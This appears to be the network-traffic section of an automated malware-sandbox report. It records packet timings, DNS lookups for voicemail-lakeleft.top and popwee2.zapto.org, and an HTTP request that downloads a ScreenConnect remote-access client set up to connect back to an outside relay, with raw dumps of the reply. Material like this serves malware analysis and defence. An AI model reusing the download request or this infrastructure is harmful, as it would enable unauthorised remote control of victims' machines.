                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:36.676949978 CET49818443192.168.2.5194.59.30.201
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:36.676981926 CET49818443192.168.2.5194.59.30.201
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:36.795351982 CET44349818194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:36.795372963 CET44349818194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:36.795444965 CET49818443192.168.2.5194.59.30.201
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:36.795456886 CET44349818194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:36.795500040 CET49818443192.168.2.5194.59.30.201
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:36.914027929 CET44349818194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:36.914048910 CET44349818194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:36.914139986 CET49818443192.168.2.5194.59.30.201
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:36.914149046 CET44349818194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:36.914197922 CET49818443192.168.2.5194.59.30.201
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:37.036501884 CET44349818194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:37.036526918 CET44349818194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:37.036669970 CET49818443192.168.2.5194.59.30.201
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:37.036679983 CET44349818194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:37.036729097 CET49818443192.168.2.5194.59.30.201
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:37.157210112 CET44349818194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:37.157238007 CET44349818194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:37.157320976 CET49818443192.168.2.5194.59.30.201
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:37.157332897 CET44349818194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:37.157375097 CET49818443192.168.2.5194.59.30.201
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:37.276813984 CET44349818194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:37.276835918 CET44349818194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:37.276916981 CET49818443192.168.2.5194.59.30.201
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:37.276926994 CET44349818194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:37.276967049 CET49818443192.168.2.5194.59.30.201
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:37.391655922 CET44349818194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:37.391680956 CET44349818194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:37.391750097 CET49818443192.168.2.5194.59.30.201
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:37.391762018 CET44349818194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:37.391812086 CET49818443192.168.2.5194.59.30.201
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:37.435153008 CET44349818194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:37.435172081 CET44349818194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:37.435302019 CET49818443192.168.2.5194.59.30.201
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:37.435327053 CET44349818194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:37.435376883 CET49818443192.168.2.5194.59.30.201
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:37.554003000 CET44349818194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:37.554020882 CET44349818194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:37.554145098 CET49818443192.168.2.5194.59.30.201
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:37.554156065 CET44349818194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:37.554198980 CET49818443192.168.2.5194.59.30.201
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:37.629782915 CET44349818194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:37.629801035 CET44349818194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:37.629934072 CET49818443192.168.2.5194.59.30.201
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:37.629947901 CET44349818194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:37.629997015 CET49818443192.168.2.5194.59.30.201
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:37.748153925 CET44349818194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:37.748176098 CET44349818194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:37.748239994 CET49818443192.168.2.5194.59.30.201
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:37.748250961 CET44349818194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:37.748287916 CET49818443192.168.2.5194.59.30.201
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:37.748311996 CET49818443192.168.2.5194.59.30.201
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:37.832947016 CET44349818194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:37.832966089 CET44349818194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:37.833015919 CET49818443192.168.2.5194.59.30.201
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:37.833024025 CET44349818194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:37.833062887 CET49818443192.168.2.5194.59.30.201
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:37.913341999 CET44349818194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:37.913358927 CET44349818194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:37.913428068 CET49818443192.168.2.5194.59.30.201
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:37.913438082 CET44349818194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:37.913471937 CET49818443192.168.2.5194.59.30.201
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:37.913491011 CET49818443192.168.2.5194.59.30.201
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:37.986304998 CET44349818194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:37.986325979 CET44349818194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:37.986442089 CET49818443192.168.2.5194.59.30.201
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:37.986449957 CET44349818194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:37.986514091 CET49818443192.168.2.5194.59.30.201
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:38.104049921 CET44349818194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:38.104070902 CET44349818194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:38.104124069 CET49818443192.168.2.5194.59.30.201
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:38.104134083 CET44349818194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:38.104161024 CET49818443192.168.2.5194.59.30.201
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:38.104182005 CET49818443192.168.2.5194.59.30.201
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:38.190105915 CET44349818194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:38.190125942 CET44349818194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:38.190196991 CET49818443192.168.2.5194.59.30.201
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:38.190213919 CET44349818194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:38.190264940 CET49818443192.168.2.5194.59.30.201
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:38.223151922 CET44349818194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:38.223169088 CET44349818194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:38.223352909 CET49818443192.168.2.5194.59.30.201
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:38.223361969 CET44349818194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:38.223408937 CET49818443192.168.2.5194.59.30.201
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:38.309964895 CET44349818194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:38.309989929 CET44349818194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:38.310085058 CET49818443192.168.2.5194.59.30.201
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:38.310096025 CET44349818194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:38.310134888 CET49818443192.168.2.5194.59.30.201
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:38.388328075 CET44349818194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:38.388351917 CET44349818194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:38.388519049 CET49818443192.168.2.5194.59.30.201
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:38.388528109 CET44349818194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:38.388593912 CET49818443192.168.2.5194.59.30.201
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:38.460558891 CET44349818194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:38.460577011 CET44349818194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:38.460690975 CET49818443192.168.2.5194.59.30.201
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:38.460707903 CET44349818194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:38.460756063 CET49818443192.168.2.5194.59.30.201
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:38.507437944 CET44349818194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:38.507457018 CET44349818194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:38.507545948 CET49818443192.168.2.5194.59.30.201
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:38.507555008 CET44349818194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:38.507605076 CET49818443192.168.2.5194.59.30.201
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:38.579447985 CET44349818194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:38.579466105 CET44349818194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:38.579569101 CET49818443192.168.2.5194.59.30.201
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:38.579576969 CET44349818194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:38.579623938 CET49818443192.168.2.5194.59.30.201
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:38.669301033 CET44349818194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:38.669320107 CET44349818194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:38.669384956 CET49818443192.168.2.5194.59.30.201
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:38.669394970 CET44349818194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:38.669435978 CET49818443192.168.2.5194.59.30.201
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:38.698179960 CET44349818194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:38.698198080 CET44349818194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:38.698252916 CET49818443192.168.2.5194.59.30.201
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:38.698261023 CET44349818194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:38.698287010 CET49818443192.168.2.5194.59.30.201
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:38.698307991 CET49818443192.168.2.5194.59.30.201
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:38.787604094 CET44349818194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:38.787621975 CET44349818194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:38.787733078 CET49818443192.168.2.5194.59.30.201
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:38.787744999 CET44349818194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:38.787790060 CET49818443192.168.2.5194.59.30.201
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:38.817171097 CET44349818194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:38.817188025 CET44349818194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:38.817286968 CET49818443192.168.2.5194.59.30.201
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:38.817296028 CET44349818194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:38.817339897 CET49818443192.168.2.5194.59.30.201
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:38.906331062 CET44349818194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:38.906349897 CET44349818194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:38.906419039 CET49818443192.168.2.5194.59.30.201
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:38.906440020 CET44349818194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:38.906482935 CET49818443192.168.2.5194.59.30.201
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:38.935702085 CET44349818194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:38.935725927 CET44349818194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:38.935774088 CET49818443192.168.2.5194.59.30.201
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:38.935782909 CET44349818194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:38.935826063 CET49818443192.168.2.5194.59.30.201
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:38.935844898 CET49818443192.168.2.5194.59.30.201
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:38.982815981 CET44349818194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:38.982837915 CET44349818194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:38.982897043 CET49818443192.168.2.5194.59.30.201
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:38.982906103 CET44349818194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:38.982955933 CET49818443192.168.2.5194.59.30.201
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:39.054476976 CET44349818194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:39.054497004 CET44349818194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:39.054580927 CET49818443192.168.2.5194.59.30.201
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:39.054596901 CET44349818194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:39.054646015 CET49818443192.168.2.5194.59.30.201
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:39.101320982 CET44349818194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:39.101341009 CET44349818194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:39.101423025 CET49818443192.168.2.5194.59.30.201
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:39.101433039 CET44349818194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:39.101475954 CET49818443192.168.2.5194.59.30.201
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:39.173175097 CET44349818194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:39.173192978 CET44349818194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:39.173261881 CET49818443192.168.2.5194.59.30.201
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:39.173269987 CET44349818194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:39.173305988 CET49818443192.168.2.5194.59.30.201
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:39.213738918 CET44349818194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:39.213758945 CET44349818194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:39.213841915 CET49818443192.168.2.5194.59.30.201
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:39.213850021 CET44349818194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:39.213895082 CET49818443192.168.2.5194.59.30.201
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:39.220246077 CET44349818194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:39.220319986 CET49818443192.168.2.5194.59.30.201
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:39.220326900 CET44349818194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:39.220484018 CET44349818194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:39.220531940 CET49818443192.168.2.5194.59.30.201
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:39.220741034 CET49818443192.168.2.5194.59.30.201
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:42.554683924 CET498608041192.168.2.5194.59.30.201
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:42.559423923 CET804149860194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:42.561857939 CET498608041192.168.2.5194.59.30.201
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:43.683147907 CET498608041192.168.2.5194.59.30.201
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:43.688240051 CET804149860194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:43.926239967 CET804149860194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:43.967437983 CET498608041192.168.2.5194.59.30.201
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:43.972429037 CET804149860194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:44.207726002 CET804149860194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:44.326678038 CET498608041192.168.2.5194.59.30.201
                                                                                                                                                                                                                                                  Nov 8, 2024 11:02:14.232996941 CET498608041192.168.2.5194.59.30.201
                                                                                                                                                                                                                                                  Nov 8, 2024 11:02:14.237879992 CET804149860194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:02:14.473512888 CET804149860194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:02:14.529745102 CET498608041192.168.2.5194.59.30.201
                                                                                                                                                                                                                                                  Nov 8, 2024 11:02:44.498595953 CET498608041192.168.2.5194.59.30.201
                                                                                                                                                                                                                                                  Nov 8, 2024 11:02:44.503370047 CET804149860194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:02:44.738926888 CET804149860194.59.30.201192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:02:44.795406103 CET498608041192.168.2.5194.59.30.201
                                                                                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:03.913659096 CET5062253192.168.2.51.1.1.1
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:03.926193953 CET53506221.1.1.1192.168.2.5
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:42.508133888 CET5545653192.168.2.51.1.1.1
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:42.516788960 CET53554561.1.1.1192.168.2.5
                                                                                                                                                                                                                                                  TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:03.913659096 CET192.168.2.51.1.1.10x3f43Standard query (0)voicemail-lakeleft.topA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:42.508133888 CET192.168.2.51.1.1.10x83d6Standard query (0)popwee2.zapto.orgA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:03.926193953 CET1.1.1.1192.168.2.50x3f43No error (0)voicemail-lakeleft.top194.59.30.201A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:05.994802952 CET1.1.1.1192.168.2.50x36d7No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:05.994802952 CET1.1.1.1192.168.2.50x36d7No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:06.657273054 CET1.1.1.1192.168.2.50x83d9No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:06.657273054 CET1.1.1.1192.168.2.50x83d9No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:08.360728979 CET1.1.1.1192.168.2.50xaaa9No error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:08.360728979 CET1.1.1.1192.168.2.50xaaa9No error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  Nov 8, 2024 11:01:42.516788960 CET1.1.1.1192.168.2.50x83d6No error (0)popwee2.zapto.org194.59.30.201A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                  • voicemail-lakeleft.top
                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                  0192.168.2.549705194.59.30.2014436172C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe
                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                  2024-11-08 10:01:05 UTC635OUTGET /Bin/ScreenConnect.Client.application?e=Support&y=Guest&h=popwee2.zapto.org&p=8041&s=4b43e651-6d21-48a4-a5c8-8436b8ee48ae&k=BgIAAACkAABSU0ExAAgAAAEAAQCpDLJbB2UCJQST7J%2beAL4SRxBN9FnGDmzuSSe%2fjH%2bnKBeOQFHQ%2bCr3LypD1KSb17oRWP4zVHy7BT585yzIdtEsLOQJGVUwzeIFWaAKwKfBsHG%2fh8GYVt85W1oIVuD0heJmJtqEdcOjXvXPD4oJuQHoqhBbYLoSnsbfrTP0R040%2bcfkCNslvuf01cnsbcAeyUEFRKIz%2b8o0YJwrixE6vdRb5cxn%2bauV36m92%2b6%2fhNC5sRzM45Hr1FU47wA4rARa8OnACYafp32jE3t2Cm7EEkMt%2bS6HWKgaZMp0VLkBgPw3WnP85fhslYN9Uz3EZtsBn%2f97CFE2jSAv4%2brdgImA3na8&r=&i=Newboom%20Session HTTP/1.1
                                                                                                                                                                                                                                                  Host: voicemail-lakeleft.top
                                                                                                                                                                                                                                                  Accept-Encoding: gzip
                                                                                                                                                                                                                                                  Connection: Keep-Alive
                                                                                                                                                                                                                                                  2024-11-08 10:01:05 UTC251INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                  Cache-Control: private
                                                                                                                                                                                                                                                  Content-Length: 117980
                                                                                                                                                                                                                                                  Content-Type: application/x-ms-application; charset=utf-8
                                                                                                                                                                                                                                                  Server: ScreenConnect/24.2.10.8991-2537422459 Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                                  Date: Fri, 08 Nov 2024 10:01:05 GMT
                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                  2024-11-08 10:01:05 UTC16133INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 61 73 6d 76 31 3a 61 73 73 65 6d 62 6c 79 20 78 73 69 3a 73 63 68 65 6d 61 4c 6f 63 61 74 69 6f 6e 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 31 20 61 73 73 65 6d 62 6c 79 2e 61 64 61 70 74 69 76 65 2e 78 73 64 22 20 6d 61 6e 69 66 65 73 74 56 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 78 6d 6c 6e 73 3a 61 73 6d 76 31 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 31 22 20 78 6d 6c 6e 73 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 6d 69 63 72 6f 73 6f 66 74 2d 63 6f 6d 3a 61 73 6d 2e 76 32 22 20 78 6d 6c 6e 73 3a 61 73 6d 76 32 3d
                                                                                                                                                                                                                                                  Data Ascii: <?xml version="1.0" encoding="utf-8"?><asmv1:assembly xsi:schemaLocation="urn:schemas-microsoft-com:asm.v1 assembly.adaptive.xsd" manifestVersion="1.0" xmlns:asmv1="urn:schemas-microsoft-com:asm.v1" xmlns="urn:schemas-microsoft-com:asm.v2" xmlns:asmv2=
                                                                                                                                                                                                                                                  2024-11-08 10:01:05 UTC16384INData Raw: 47 6c 69 52 47 38 79 66 59 52 6f 64 77 71 45 6c 46 44 4c 68 4b 54 47 45 6b 53 6b 48 75 45 45 6c 4f 31 6d 42 49 59 67 77 51 54 4d 39 72 37 45 35 69 6e 4a 52 53 58 55 49 59 55 79 31 33 46 46 43 58 6b 4e 52 56 67 42 49 49 56 64 59 61 51 46 57 34 36 48 68 59 43 77 4a 63 57 48 61 72 43 46 67 30 41 33 42 5a 69 6a 54 45 5a 37 35 39 53 47 39 4a 2f 42 78 37 6a 76 49 67 65 76 55 2b 52 48 6d 39 47 32 52 37 6f 79 66 6f 65 77 58 79 75 48 77 39 4f 45 53 42 36 7a 43 6f 67 4a 72 39 62 49 45 39 4b 4f 79 46 4a 6c 31 59 68 45 58 59 63 49 74 50 52 58 43 4c 58 66 4a 4d 69 37 52 32 79 49 75 4c 43 75 53 4b 59 33 42 51 6a 4e 43 7a 2b 49 2f 2b 4a 57 79 52 67 6f 57 67 6b 77 6a 5a 75 4a 47 48 4c 62 69 51 6a 30 32 38 6b 68 48 35 7a 4a 4c 4a 32 74 43 54 42 31 6d 59 6c 66 59 4e 57 4a
                                                                                                                                                                                                                                                  Data Ascii: GliRG8yfYRodwqElFDLhKTGEkSkHuEElO1mBIYgwQTM9r7E5inJRSXUIYUy13FFCXkNRVgBIIVdYaQFW46HhYCwJcWHarCFg0A3BZijTEZ759SG9J/Bx7jvIgevU+RHm9G2R7oyfoewXyuHw9OESB6zCogJr9bIE9KOyFJl1YhEXYcItPRXCLXfJMi7R2yIuLCuSKY3BQjNCz+I/+JWyRgoWgkwjZuJGHLbiQj028khH5zJLJ2tCTB1mYlfYNWJ
